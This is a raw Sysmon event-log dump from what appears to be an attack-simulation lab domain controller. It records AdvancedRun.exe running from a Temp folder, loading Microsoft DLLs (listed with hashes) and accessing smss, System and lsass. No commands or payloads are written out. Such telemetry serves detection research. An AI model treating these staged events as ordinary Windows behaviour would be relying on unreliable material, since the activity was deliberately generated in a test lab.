18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004009349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004009348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004009346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.725{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009330Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009318Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009314Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009313Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009311Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009310Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 